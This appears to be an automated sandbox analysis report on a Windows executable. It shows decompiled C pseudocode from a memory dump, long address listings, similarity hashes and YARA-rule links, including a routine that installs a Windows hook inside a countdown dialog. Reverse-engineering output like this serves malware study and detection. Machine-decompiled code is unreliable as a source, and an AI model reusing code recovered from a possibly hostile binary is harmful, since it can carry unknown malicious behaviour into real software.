																											if(_t575 != _t490) {
																												goto L115;
																											} else {
																												goto L129;
																											}
																										}
																									}
																								} else {
																									E0041969C( &_v16);
																									E00418E1D( &_v24);
																									goto L113;
																								}
																							} else {
																								E0041969C( &_v16);
																								E00418E1D( &_v24);
																								_t490 = _a4;
																								goto L113;
																							}
																						}
																					}
																				} else {
																					__eflags = _t575 - _t490;
																					if(_t575 == _t490) {
																						L129:
																						 *((char*)(_t585 + 0x130)) = 1;
																						 *((intOrPtr*)(_t585 + 0x120)) =  *((intOrPtr*)(_t594 + 0x70));
																						 *((intOrPtr*)(_t585 + 0x124)) =  *((intOrPtr*)(_t594 + 0x74));
																						_t426 = E0041A836(_t594, _t575, _t585, _a8, _a12, _a16, _a20);
																						E0041969C( &_v16);
																						E00418E1D( &_v24);
																						_push(_v32);
																						L0041C160();
																						_t396 = _t426;
																					} else {
																						goto L120;
																					}
																				}
																			} else {
																				_t490 = _t412;
																				L113:
																				_push(_v32);
																				L0041C160();
																				_t396 = _t490;
																			}
																		} else {
																			goto L110;
																		}
																	}
																}
															} else {
																if(__eflags < 0) {
																	L103:
																	 *((char*)(_t585 + 0x133)) = 1;
																	goto L104;
																} else {
																	__eflags = _t521 - _v32;
																	if(_t521 >= _v32) {
																		goto L107;
																	} else {
																		goto L103;
																	}
																}
															}
														} else {
															__eflags = _t572 | _v20;
															if((_t572 | _v20) != 0) {
																L105:
																_t396 = _t395 + 1;
																__eflags = _t396;
															} else {
																 *((char*)(_t585 + 0x130)) = 1;
															}
														}
													} else {
														__eflags = _v12 - _t490;
														if(_v12 > _t490) {
															goto L104;
														} else {
															goto L95;
														}
													}
												}
											} else {
												__eflags = _t572;
												if(_t572 < 0) {
													goto L104;
												} else {
													goto L92;
												}
											}
										}
									}
									return _t396;
								} else {
									if(__eflags < 0) {
										L21:
										_push(1);
										_a4 = _t570;
										E004192D4(_t599, _t592,  *((intOrPtr*)(_t390 + 8)) +  *_t390, _a84);
										_t584 = 0;
										__eflags = _a96;
										if(__eflags > 0) {
											L64:
											 *((char*)(_t486 + 0x135)) = 1;
											 *((intOrPtr*)( *((intOrPtr*)(_t592 + 0x38)) + 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t592 + 0x38)) + 4));
											goto L65;
										} else {
											if(__eflags < 0) {
												L24:
												_t438 = _a92 + 0xfffffff2;
												__eflags = _t438 - 0xb;
												if(__eflags > 0) {
													goto L64;
												} else {
													switch( *((intOrPtr*)(_t438 * 4 +  &M0041ADD2))) {
														case 0:
															__eax =  &_a60;
															__ecx = __esi;
															__eax = E00419845(__esi, __edx, _a108,  &_a60);
															__eax = 0;
															_a124 = __edi;
															__eflags = _a64 - __edi;
															if(__eflags > 0) {
																do {
																	__ecx = _a60;
																	__eflags =  *((char*)(__ecx + __eax));
																	if( *((char*)(__ecx + __eax)) != 0) {
																		_t156 =  &_a124;
																		 *_t156 = _a124 + 1;
																		__eflags =  *_t156;
																	}
																	__eax = __eax + 1;
																	__eflags = __eax - _a64;
																} while (__eflags < 0);
															}
															__edi = _a124;
															 &_a24 = E00419725( &_a24, __edi, __eflags);
															 &_a48 = E00419725( &_a48, __edi, __eflags);
															goto L35;
														case 1:
															__eax =  &_a24;
															goto L48;
														case 2:
															__eax =  &_a48;
															L48:
															__ecx = __esi;
															__eax = E00419845(__ecx, __edx, _a124, __eax);
															goto L35;
														case 3:
															_v16 = _t584;
															E00419747( &_v20, _t570, _t599, __eflags, _t592,  &_a72);
															_t584 =  *((intOrPtr*)( *((intOrPtr*)(_t592 + 0x38)) + 4)) -  *((intOrPtr*)( *((intOrPtr*)(_t592 + 0x38)) + 8));
															E0040BBD0(_t486 + 0xd0, _t584);
															E00418E93( *((intOrPtr*)(_t592 + 0x38)),  *((intOrPtr*)(_t486 + 0xd0)), _t584);
															E0041911E(_t486 + 0xd8, __eflags,  *(_t486 + 0x5c) + 1);
															_t570 = 0;
															_t447 = 0;
															_a116 = 0;
															_a112 = 0;
															__eflags =  *(_t486 + 0x5c);
															if( *(_t486 + 0x5c) <= 0) {
																L32:
																_t570 = _t570 >> 1;
																 *( *((intOrPtr*)(_t486 + 0xd8)) + _t447 * 4) = _t570;
																__eflags = _a116 - _t584;
																if(_a116 != _t584) {
																	 *((char*)(_t592 + 0x3c)) = 1;
																}
																E00418E1D( &_v20);
																goto L35;
															} else {
																do {
																	_a120 = _a120 & 0x00000000;
																	_t451 =  *((intOrPtr*)(_t486 + 0xd0)) + _t570;
																	_t503 = _t584 - _t570 >> 1;
																	__eflags = _t503;
																	if(_t503 != 0) {
																		while(1) {
																			_t570 = _a120;
																			__eflags =  *((short*)(_t451 + _t570 * 2));
																			if( *((short*)(_t451 + _t570 * 2)) == 0) {
																				goto L30;
																			}
																			_a120 = _a120 + 1;
																			__eflags = _a120 - _t503;
																			if(_a120 < _t503) {
																				continue;
																			}
																			goto L30;
																		}
																	}
																	L30:
																	__eflags = _a120 - _t503;
																	if(_a120 == _t503) {
																		goto L87;
																	} else {
																		goto L31;
																	}
																	goto L130;
																	L31:
																	_t452 = _a112;
																	 *( *((intOrPtr*)(_t486 + 0xd8)) + _t452 * 4) = _a116 >> 1;
																	_t447 = _t452 + 1;
																	_t570 = _a116 + 2 + _a120 * 2;
																	_a116 = _t570;
																	_a112 = _t447;
																	__eflags = _t447 -  *(_t486 + 0x5c);
																} while (_t447 <  *(_t486 + 0x5c));
																goto L32;
															}
															goto L130;
														case 4:
															__eax = __ebx + 0x64;
															goto L51;
														case 5:
															__eax = __ebx + 0x7c;
															goto L51;
														case 6:
															__eax = __ebx + 0x94;
															goto L51;
														case 7:
															__eax =  &_v12;
															__ecx = __esi;
															_v12 = __edi;
															_v8 = __edi;
															_v4 = __edi;
															E00419893(__esi, __edx, __edi, __ebp, __eflags,  *((intOrPtr*)(__ebx + 0x5c)),  &_v12) =  &_a72;
															__ecx =  &_a8;
															_a12 = __di;
															__eax = E00419747( &_a8, __edx, __ebp, __eflags, __esi,  &_a72);
															_a120 = __edi;
															__eflags = _a108 - __edi;
															if(_a108 > __edi) {
																_a116 = __edi;
																do {
																	__edi =  *(__ebx + 0x58);
																	__eax = _v12;
																	__ecx = _a120;
																	__edi =  *(__ebx + 0x58) + _a116;
																	__al =  *((intOrPtr*)(_v12 + _a120));
																	 *((char*)(__edi + 0x13)) = __al;
																	__eflags = __al;
																	if(__al != 0) {
																		__ecx =  *((intOrPtr*)(__esi + 0x38));
																		 *((intOrPtr*)(__edi + 8)) = E00418FFB( *((intOrPtr*)(__esi + 0x38)));
																	}
																	_a120 = _a120 + 1;
																	__eax = _a120;
																	_a116 = _a116 + 0x18;
																	__eflags = _a120 - _a108;
																} while (_a120 < _a108);
															}
															__ecx =  &_a8;
															__eax = E00418E1D( &_a8);
															_push(_v12);
															L0041C160();
															_pop(__ecx);
															goto L35;
														case 8:
															goto L64;
														case 9:
															__eax = __ebx + 0xac;
															L51:
															__ecx = __esi;
															 &_a72 = E004198DE(__ecx, __edx, __eflags,  &_a72,  &_a72, _a108);
															L35:
															E00419652(_t486 + 0x108, _t570, _a92, _a96);
															goto L65;
														case 0xa:
															_a16 = __edi;
															__eflags = _a88 - __edi;
															if(__eflags >= 0) {
																if(__eflags > 0) {
																	L58:
																	__ecx =  *((intOrPtr*)(__esi + 0x38));
																	__eax = E00418E7C(__ecx, __edi);
																	__eflags = __al;
																	if(__al != 0) {
																		 *((char*)(__esi + 0x3c)) = 1;
																	}
																	_a16 = _a16 + 1;
																	asm("adc edi, 0x0");
																	__eflags = __edi - _a88;
																} else {
																	__eflags = _a84 - __edi;
																	if(_a84 > __edi) {
																		goto L58;
																		do {
																			do {
																				goto L58;
																			} while (__eflags < 0);
																			if(__eflags <= 0) {
																				goto L62;
																			}
																			goto L65;
																			L62:
																			__eax = _a84;
																			__eflags = _a16 - _a84;
																		} while (_a16 < _a84);
																	}
																}
															}
															L65:
															_t503 =  *((intOrPtr*)( *((intOrPtr*)(_t592 + 0x38)) + 4)) -  *((intOrPtr*)( *((intOrPtr*)(_t592 + 0x38)) + 8));
															__eflags = _t503;
															if(_t503 != 0) {
																goto L87;
															} else {
																E00418E1D(_t599);
																goto L67;
															}
															goto L130;
													}
												}
											} else {
												__eflags = _a92 - 0x40000000;
												if(_a92 > 0x40000000) {
													goto L64;
												} else {
													goto L24;
												}
											}
										}
									} else {
										__eflags = _a84 - _t503;
										if(_a84 > _t503) {
											goto L87;
										} else {
											goto L21;
										}
									}
								}
								goto L130;
							}
							E00418FB1(_t501);
							__eflags = _a108 - _a124 - _a40;
							if(_a108 - _a124 != _a40) {
								E00418E04(_t501);
							}
							_t556 = _a48;
							_t587 = 0;
							_t456 = 0;
							_a116 = 0;
							__eflags = _a124;
							if(_a124 > 0) {
								do {
									__eflags =  *((char*)(_t556 + _t456));
									if( *((char*)(_t556 + _t456)) != 0) {
										_t199 =  &_a116;
										 *_t199 = _a116 + 1;
										__eflags =  *_t199;
									}
									_t456 = _t456 + 1;
									__eflags = _t456 - _a124;
								} while (_t456 < _a124);
							}
							_a120 = _t587;
							__eflags = _a108 - _t587;
							if(__eflags > 0) {
								_t458 = _a24 - _t556;
								__eflags = _t458;
								_a112 = _t556;
								_a124 = _t587;
								_a88 = _t458;
								do {
									_t598 =  *((intOrPtr*)(_t486 + 0x58)) + _a124;
									_t459 = _a60;
									__eflags =  *((char*)(_t459 + _a120));
									_t460 = _t459 & 0xffffff00 |  *((char*)(_t459 + _a120)) == 0x00000000;
									 *(_t598 + 0x10) = _t460;
									 *((intOrPtr*)(_t598 + 0xc)) = 0;
									__eflags = _t460;
									if(_t460 == 0) {
										_t461 = _a112;
										_t579 = _a88;
										__eflags =  *(_t579 + _t461);
										 *((char*)(_t598 + 0x11)) = _t579 & 0xffffff00 |  *(_t579 + _t461) == 0x00000000;
										_t570 =  *_t461;
										_t462 = _t461 + 1;
										__eflags = _t462;
										_a96 =  *_t461;
										_a112 = _t462;
										 *_t598 = 0;
										 *((intOrPtr*)(_t598 + 4)) = 0;
										 *((char*)(_t598 + 0x12)) = 0;
									} else {
										_t465 = _a36;
										 *((char*)(_t598 + 0x11)) = 0;
										_a96 = 0;
										 *_t598 =  *((intOrPtr*)(_t465 + _t587 * 8));
										 *((intOrPtr*)(_t598 + 4)) =  *((intOrPtr*)(_t465 + 4 + _t587 * 8));
										_t467 = E004192B9( &_v44, _t587);
										 *((char*)(_t598 + 0x12)) = _t467;
										__eflags = _t467;
										if(_t467 != 0) {
											 *((intOrPtr*)(_t598 + 0xc)) =  *((intOrPtr*)(_v32 + _t587 * 4));
										}
										_t587 = _t587 + 1;
									}
									__eflags = _a116;
									if(_a116 != 0) {
										E0041967B(_t486 + 0xc4, _a96);
									}
									_a120 = _a120 + 1;
									_a124 = _a124 + 0x18;
									__eflags = _a120 - _a108;
								} while (__eflags < 0);
							}
							_push(_a48);
							L0041C160();
							_push(_a24);
							L0041C160();
							_push(_a60);
							L0041C160();
							_t603 = _t603 + 0xc;
						}
						goto L85;
					}
				} else {
					_t611 = _t570 - _t582;
					if(_t570 != _t582) {
						goto L9;
					} else {
						_push(_a124);
						_push(_a120);
						_t590 = _t486 + 0x100;
						_push(_a116);
						_t479 = E0041A63E(_t592, _t570, _t611,  *((intOrPtr*)(_t486 + 0xf0)),  *((intOrPtr*)(_t486 + 0xf4)), _t590,  &_a72, _a112);
						_a108 = _t479;
						if(_t479 == 0) {
							 *_t590 =  *_t590 +  *((intOrPtr*)(_t486 + 0xf0));
							asm("adc [edi+0x4], eax");
							_t374 = E00418FB1( *((intOrPtr*)(_t592 + 0x38)));
							_t582 = 0;
							__eflags = 0;
							goto L9;
						} else {
							E0041969C( &_a72);
							_t377 = _a108;
							L86:
							return _t377;
						}
					}
				}
				L130:
			}









































































                                          0x0041a836
                                          0x0041a837
                                          0x0041a83b
                                          0x0041a843
                                          0x0041a849
                                          0x0041a84e
                                          0x0041a854
                                          0x0041a874
                                          0x0041a874
                                          0x0041a856
                                          0x0041a856
                                          0x0041a858
                                          0x0041a85a
                                          0x0041a865
                                          0x0041a86d
                                          0x0041a86d
                                          0x0041a85a
                                          0x0041a876
                                          0x0041a879
                                          0x0041a87c
                                          0x0041a882
                                          0x0041a8e4
                                          0x0041a8e4
                                          0x0041a8e7
                                          0x0041a8ea
                                          0x0041a8ed
                                          0x0041a8f0
                                          0x0041a8f3
                                          0x0041a8f6
                                          0x0041a8f9
                                          0x0041a8fc
                                          0x0041a8ff
                                          0x0041a902
                                          0x0041a904
                                          0x0041a906
                                          0x0041a911
                                          0x0041a91e
                                          0x0041a929
                                          0x0041a931
                                          0x0041a937
                                          0x0041a93c
                                          0x0041a93c
                                          0x0041a93c
                                          0x0041a906
                                          0x0041a93e
                                          0x0041a941
                                          0x0041a944
                                          0x0041ad95
                                          0x0041ad97
                                          0x0041ad9c
                                          0x0041ad9f
                                          0x0041ada4
                                          0x0041ada7
                                          0x0041adac
                                          0x0041adaf
                                          0x0041adba
                                          0x0041adbf
                                          0x0041adbf
                                          0x00000000
                                          0x0041a94a
                                          0x0041a94a
                                          0x0041a94c
                                          0x0041a95e
                                          0x0041a961
                                          0x0041a972
                                          0x0041a975
                                          0x0041a983
                                          0x0041a988
                                          0x0041a98b
                                          0x0041a98d
                                          0x0041a990
                                          0x0041a99b
                                          0x0041a99b
                                          0x0041a990
                                          0x0041a9a0
                                          0x0041a9a5
                                          0x0041a9a8
                                          0x0041a9ab
                                          0x0041a9b1
                                          0x0041a9b8
                                          0x0041a9bb
                                          0x0041a9be
                                          0x0041a9c1
                                          0x0041a9c4
                                          0x0041a9c7
                                          0x0041a9ca
                                          0x0041ac7d
                                          0x0041ac7d
                                          0x0041ac80
                                          0x0041ac85
                                          0x0041ac88
                                          0x0041ac8b
                                          0x0041ac8d
                                          0x0041ac90
                                          0x00000000
                                          0x00000000
                                          0x0041a9d7
                                          0x0041a9da
                                          0x0041a9e0
                                          0x0041a9e3
                                          0x0041a9e6
                                          0x0041a9e8
                                          0x0041a9eb
                                          0x0041adcb
                                          0x0041adcb
                                          0x0041add2
                                          0x0041add3
                                          0x0041add7
                                          0x0041add8
                                          0x0041add9
                                          0x0041addb
                                          0x0041addc
                                          0x0041addd
                                          0x0041ade1
                                          0x0041ade7
                                          0x0041ade9
                                          0x0041adeb
                                          0x0041aded
                                          0x0041adef
                                          0x0041adf1
                                          0x0041adf5
                                          0x0041adf9
                                          0x0041adfb
                                          0x0041adfd
                                          0x0041adff
                                          0x0041ae00
                                          0x0041ae01
                                          0x0041ae01
                                          0x0041ae01
                                          0x0041ae02
                                          0x0041ae08
                                          0x0041ae09
                                          0x0041ae0a
                                          0x0041ae0b
                                          0x0041ae0e
                                          0x0041ae12
                                          0x0041ae1a
                                          0x0041ae23
                                          0x0041ae2c
                                          0x0041ae35
                                          0x0041ae37
                                          0x0041ae3d
                                          0x0041ae43
                                          0x0041af36
                                          0x0041af36
                                          0x0041af36
                                          0x00000000
                                          0x0041ae49
                                          0x0041ae4f
                                          0x0041ae52
                                          0x0041ae58
                                          0x0041ae5e
                                          0x0041ae64
                                          0x0041ae6d
                                          0x0041ae6f
                                          0x0041ae72
                                          0x0041ae78
                                          0x0041ae7e
                                          0x0041ae88
                                          0x0041ae8e
                                          0x0041ae94
                                          0x0041ae97
                                          0x00000000
                                          0x0041ae9d
                                          0x0041ae9d
                                          0x0041aea7
                                          0x0041aea7
                                          0x0041aeae
                                          0x00000000
                                          0x0041aeb4
                                          0x0041aeb4
                                          0x0041aebb
                                          0x0041aebe
                                          0x0041aebe
                                          0x0041aec1
                                          0x0041aed1
                                          0x0041aed7
                                          0x0041aed9
                                          0x0041aed9
                                          0x0041aee9
                                          0x0041aeeb
                                          0x0041aef1
                                          0x0041aef4
                                          0x0041aef6
                                          0x0041aef9
                                          0x0041aefc
                                          0x0041af04
                                          0x0041af06
                                          0x0041af0c
                                          0x0041af15
                                          0x0041af1e
                                          0x0041af24
                                          0x0041af26
                                          0x0041af40
                                          0x0041af40
                                          0x0041af4e
                                          0x0041af51
                                          0x0041af53
                                          0x0041af55
                                          0x0041af58
                                          0x0041af5a
                                          0x0041af61
                                          0x0041af61
                                          0x0041af5c
                                          0x0041af5c
                                          0x0041af5f
                                          0x0041af68
                                          0x0041af6b
                                          0x0041af78
                                          0x0041af7b
                                          0x0041af80
                                          0x0041af82
                                          0x0041af93
                                          0x0041af96
                                          0x0041af99
                                          0x0041af9e
                                          0x0041afa1
                                          0x0041afa3
                                          0x0041afa3
                                          0x0041afa3
                                          0x0041afa8
                                          0x0041afae
                                          0x0041afb0
                                          0x0041afb0
                                          0x0041afb7
                                          0x0041afc1
                                          0x0041afc6
                                          0x0041afcb
                                          0x0041afce
                                          0x0041afd1
                                          0x0041afd4
                                          0x0041afd7
                                          0x0041afdc
                                          0x0041afdf
                                          0x0041afe9
                                          0x0041afe9
                                          0x0041afec
                                          0x00000000
                                          0x0041afee
                                          0x0041afee
                                          0x0041aff0
                                          0x00000000
                                          0x0041aff2
                                          0x0041aff2
                                          0x0041aff8
                                          0x0041affb
                                          0x0041affd
                                          0x0041b017
                                          0x0041b01c
                                          0x0041b01f
                                          0x0041b021
                                          0x0041b03b
                                          0x0041b03e
                                          0x0041b055
                                          0x0041b059
                                          0x00000000
                                          0x0041b05f
                                          0x0041b062
                                          0x0041b070
                                          0x0041b075
                                          0x0041b078
                                          0x0041b07d
                                          0x0041b080
                                          0x00000000
                                          0x0041b086
                                          0x0041b086
                                          0x0041b088
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041b088
                                          0x0041b080
                                          0x0041b040
                                          0x0041b043
                                          0x0041b04b
                                          0x00000000
                                          0x0041b04b
                                          0x0041b023
                                          0x0041b026
                                          0x0041b02e
                                          0x0041b033
                                          0x00000000
                                          0x0041b033
                                          0x0041b021
                                          0x0041aff0
                                          0x0041afe1
                                          0x0041afe1
                                          0x0041afe3
                                          0x0041b08e
                                          0x0041b091
                                          0x0041b0a1
                                          0x0041b0b0
                                          0x0041b0b6
                                          0x0041b0c0
                                          0x0041b0c8
                                          0x0041b0cd
                                          0x0041b0d0
                                          0x0041b0d6
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041afe3
                                          0x0041af84
                                          0x0041af84
                                          0x0041af86
                                          0x0041af86
                                          0x0041af89
                                          0x0041af8f
                                          0x0041af8f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041af5f
                                          0x0041af5a
                                          0x0041af28
                                          0x0041af28
                                          0x0041af2f
                                          0x0041af2f
                                          0x00000000
                                          0x0041af2a
                                          0x0041af2a
                                          0x0041af2d
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041af2d
                                          0x0041af28
                                          0x0041aec3
                                          0x0041aec3
                                          0x0041aec6
                                          0x0041af38
                                          0x0041af38
                                          0x0041af38
                                          0x0041aec8
                                          0x0041aec8
                                          0x0041aec8
                                          0x0041aec6
                                          0x0041aeb6
                                          0x0041aeb6
                                          0x0041aeb9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041aeb9
                                          0x0041aeb4
                                          0x0041ae9f
                                          0x0041ae9f
                                          0x0041aea1
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041aea1
                                          0x0041ae9d
                                          0x0041ae97
                                          0x0041af3d
                                          0x0041a9f1
                                          0x0041a9f1
                                          0x0041a9fc
                                          0x0041aa01
                                          0x0041aa06
                                          0x0041aa0f
                                          0x0041aa14
                                          0x0041aa16
                                          0x0041aa19
                                          0x0041ac56
                                          0x0041ac56
                                          0x0041ac63
                                          0x00000000
                                          0x0041aa1f
                                          0x0041aa1f
                                          0x0041aa2e
                                          0x0041aa31
                                          0x0041aa34
                                          0x0041aa37
                                          0x00000000
                                          0x0041aa3d
                                          0x0041aa3d
                                          0x00000000
                                          0x0041ab99
                                          0x0041aba0
                                          0x0041aba2
                                          0x0041aba7
                                          0x0041aba9
                                          0x0041abac
                                          0x0041abaf
                                          0x0041abb1
                                          0x0041abb1
                                          0x0041abb4
                                          0x0041abb8
                                          0x0041abba
                                          0x0041abba
                                          0x0041abba
                                          0x0041abba
                                          0x0041abbd
                                          0x0041abbe
                                          0x0041abbe
                                          0x0041abb1
                                          0x0041abc3
                                          0x0041abc9
                                          0x0041abd1
                                          0x00000000
                                          0x00000000
                                          0x0041abdb
                                          0x00000000
                                          0x00000000
                                          0x0041abee
                                          0x0041abde
                                          0x0041abe2
                                          0x0041abe4
                                          0x00000000
                                          0x00000000
                                          0x0041aa4c
                                          0x0041aa50
                                          0x0041aa5b
                                          0x0041aa65
                                          0x0041aa74
                                          0x0041aa84
                                          0x0041aa89
                                          0x0041aa8b
                                          0x0041aa8d
                                          0x0041aa90
                                          0x0041aa93
                                          0x0041aa96
                                          0x0041aaee
                                          0x0041aaf4
                                          0x0041aaf6
                                          0x0041aaf9
                                          0x0041aafc
                                          0x0041aafe
                                          0x0041aafe
                                          0x0041ab05
                                          0x00000000
                                          0x0041aa98
                                          0x0041aa98
                                          0x0041aa9e
                                          0x0041aaa6
                                          0x0041aaa8
                                          0x0041aaa8
                                          0x0041aaaa
                                          0x0041aaac
                                          0x0041aaac
                                          0x0041aaaf
                                          0x0041aab4
                                          0x00000000
                                          0x00000000
                                          0x0041aab6
                                          0x0041aab9
                                          0x0041aabc
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041aabc
                                          0x0041aaac
                                          0x0041aabe
                                          0x0041aabe
                                          0x0041aac1
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041aac7
                                          0x0041aaca
                                          0x0041aad5
                                          0x0041aade
                                          0x0041aadf
                                          0x0041aae3
                                          0x0041aae6
                                          0x0041aae9
                                          0x0041aae9
                                          0x00000000
                                          0x0041aa98
                                          0x00000000
                                          0x00000000
                                          0x0041ac0d
                                          0x00000000
                                          0x00000000
                                          0x0041ac12
                                          0x00000000
                                          0x00000000
                                          0x0041ac17
                                          0x00000000
                                          0x00000000
                                          0x0041ab20
                                          0x0041ab27
                                          0x0041ab29
                                          0x0041ab2c
                                          0x0041ab2f
                                          0x0041ab37
                                          0x0041ab3c
                                          0x0041ab3f
                                          0x0041ab43
                                          0x0041ab48
                                          0x0041ab4b
                                          0x0041ab4e
                                          0x0041ab50
                                          0x0041ab53
                                          0x0041ab53
                                          0x0041ab56
                                          0x0041ab59
                                          0x0041ab5c
                                          0x0041ab5f
                                          0x0041ab62
                                          0x0041ab65
                                          0x0041ab67
                                          0x0041ab69
                                          0x0041ab71
                                          0x0041ab71
                                          0x0041ab74
                                          0x0041ab77
                                          0x0041ab7a
                                          0x0041ab7e
                                          0x0041ab7e
                                          0x0041ab53
                                          0x0041ab83
                                          0x0041ab86
                                          0x0041ab8b
                                          0x0041ab8e
                                          0x0041ab93
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041abf3
                                          0x0041abf9
                                          0x0041abfc
                                          0x0041ac03
                                          0x0041ab0a
                                          0x0041ab16
                                          0x00000000
                                          0x00000000
                                          0x0041ac1f
                                          0x0041ac22
                                          0x0041ac25
                                          0x0041ac27
                                          0x0041ac2e
                                          0x0041ac2e
                                          0x0041ac31
                                          0x0041ac36
                                          0x0041ac38
                                          0x0041ac3a
                                          0x0041ac3a
                                          0x0041ac3e
                                          0x0041ac42
                                          0x0041ac45
                                          0x0041ac29
                                          0x0041ac29
                                          0x0041ac2c
                                          0x00000000
                                          0x0041ac2e
                                          0x0041ac2e
                                          0x00000000
                                          0x00000000
                                          0x0041ac4a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041ac4c
                                          0x0041ac4c
                                          0x0041ac4f
                                          0x0041ac4f
                                          0x0041ac54
                                          0x0041ac2c
                                          0x0041ac27
                                          0x0041ac66
                                          0x0041ac6c
                                          0x0041ac6c
                                          0x0041ac6f
                                          0x00000000
                                          0x0041ac75
                                          0x0041ac78
                                          0x00000000
                                          0x0041ac78
                                          0x00000000
                                          0x00000000
                                          0x0041aa3d
                                          0x0041aa21
                                          0x0041aa21
                                          0x0041aa28
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041aa28
                                          0x0041aa1f
                                          0x0041a9f3
                                          0x0041a9f3
                                          0x0041a9f6
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041a9f6
                                          0x0041a9f1
                                          0x00000000
                                          0x0041a9eb
                                          0x0041ac96
                                          0x0041aca1
                                          0x0041aca4
                                          0x0041aca6
                                          0x0041aca6
                                          0x0041acab
                                          0x0041acae
                                          0x0041acb0
                                          0x0041acb2
                                          0x0041acb5
                                          0x0041acb8
                                          0x0041acba
                                          0x0041acba
                                          0x0041acbe
                                          0x0041acc0
                                          0x0041acc0
                                          0x0041acc0
                                          0x0041acc0
                                          0x0041acc3
                                          0x0041acc4
                                          0x0041acc4
                                          0x0041acba
                                          0x0041acc9
                                          0x0041accc
                                          0x0041accf
                                          0x0041acd8
                                          0x0041acd8
                                          0x0041acda
                                          0x0041acdd
                                          0x0041ace0
                                          0x0041ace3
                                          0x0041ace6
                                          0x0041ace9
                                          0x0041acef
                                          0x0041acf3
                                          0x0041acf8
                                          0x0041acfb
                                          0x0041acfe
                                          0x0041ad00
                                          0x0041ad33
                                          0x0041ad36
                                          0x0041ad39
                                          0x0041ad3f
                                          0x0041ad42
                                          0x0041ad44
                                          0x0041ad44
                                          0x0041ad45
                                          0x0041ad48
                                          0x0041ad4b
                                          0x0041ad4d
                                          0x0041ad50
                                          0x0041ad02
                                          0x0041ad02
                                          0x0041ad05
                                          0x0041ad08
                                          0x0041ad0e
                                          0x0041ad18
                                          0x0041ad1b
                                          0x0041ad20
                                          0x0041ad23
                                          0x0041ad25
                                          0x0041ad2d
                                          0x0041ad2d
                                          0x0041ad30
                                          0x0041ad30
                                          0x0041ad53
                                          0x0041ad57
                                          0x0041ad62
                                          0x0041ad62
                                          0x0041ad67
                                          0x0041ad6d
                                          0x0041ad71
                                          0x0041ad71
                                          0x0041ace3
                                          0x0041ad7a
                                          0x0041ad7d
                                          0x0041ad82
                                          0x0041ad85
                                          0x0041ad8a
                                          0x0041ad8d
                                          0x0041ad92
                                          0x0041ad92
                                          0x00000000
                                          0x0041a94c
                                          0x0041a884
                                          0x0041a884
                                          0x0041a886
                                          0x00000000
                                          0x0041a888
                                          0x0041a888
                                          0x0041a88e
                                          0x0041a891
                                          0x0041a897
                                          0x0041a8ad
                                          0x0041a8b2
                                          0x0041a8b7
                                          0x0041a8cf
                                          0x0041a8d7
                                          0x0041a8dd
                                          0x0041a8e2
                                          0x0041a8e2
                                          0x00000000
                                          0x0041a8b9
                                          0x0041a8bc
                                          0x0041a8c1
                                          0x0041adc1
                                          0x0041adc8
                                          0x0041adc8
                                          0x0041a8b7
                                          0x0041a886
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2a6926a2a1545e1076c32de7eff06156fa885bf53ffc5999b522f7fa9f556010
                                          • Instruction ID: 4dad77f0705915c109804cafeeec3e4362490793768c25b28525cfb381627a1a
                                          • Opcode Fuzzy Hash: 2a6926a2a1545e1076c32de7eff06156fa885bf53ffc5999b522f7fa9f556010
                                          • Instruction Fuzzy Hash: 25124771901248DFCB25DF69C980AED7BF6BF44304F14846EF81587262DB38E895CB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408D9C, Relevance: 7.5, APIs: 5, Instructions: 47threadCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 80%
                                          			E00408D9C(void* __ecx, void* __edx) {
				char _v16;
				short _v528;
				void* _t23;
				WCHAR* _t42;
				void* _t50;
				void* _t51;
				long _t63;

				_t38 = __ecx;
				_t50 = __ecx;
				 *((intOrPtr*)(__ecx + 0x48)) =  *((intOrPtr*)(__ecx + 0x48)) - 1;
				_t63 =  *0x4228b8; // 0x0
				if(_t63 == 0) {
					__eax = GetCurrentThreadId();
					 *0x4228b8 = __eax;
				}
				__eflags =  *0x4228bc; // 0x0
				if(__eflags == 0) {
					 *0x4228bc = SetWindowsHookExW(2, E00408D6E, 0, GetCurrentThreadId());
				}
				__eflags =  *(_t50 + 0x48);
				if( *(_t50 + 0x48) != 0) {
					_t38 = _t50;
					_pop(_t50);
					_pop(0);
					_push(0);
					_push(_t50);
					_t51 = _t38;
					E00414839( &_v16, _t51 + 0x3c);
					if( *((intOrPtr*)(_t51 + 0x48)) > 0) {
						_t42 = 0x1d;
						wsprintfW( &_v528, L" (%d%s)",  *((intOrPtr*)(_t51 + 0x48)), E00403CE0(_t42));
						E00414922( &_v16,  &_v528);
					}
					_t23 = E0040790B(GetDlgItem( *(_t51 + 4),  *(_t51 + 0x4c)), _v16);
					_push(_v16);
					L0041C160();
					return _t23;
				} else {
					 *0x4228c0 = 1;
					__eflags =  *((intOrPtr*)(_t50 + 0x4c)) - 0x4b4;
					_t17 =  *((intOrPtr*)(_t50 + 0x4c)) != 0x4b4;
					__eflags = _t17;
					return EndDialog( *(_t50 + 4), 0 | _t17);
				}
			}










                                          0x00408d9c
                                          0x00408da5
                                          0x00408da7
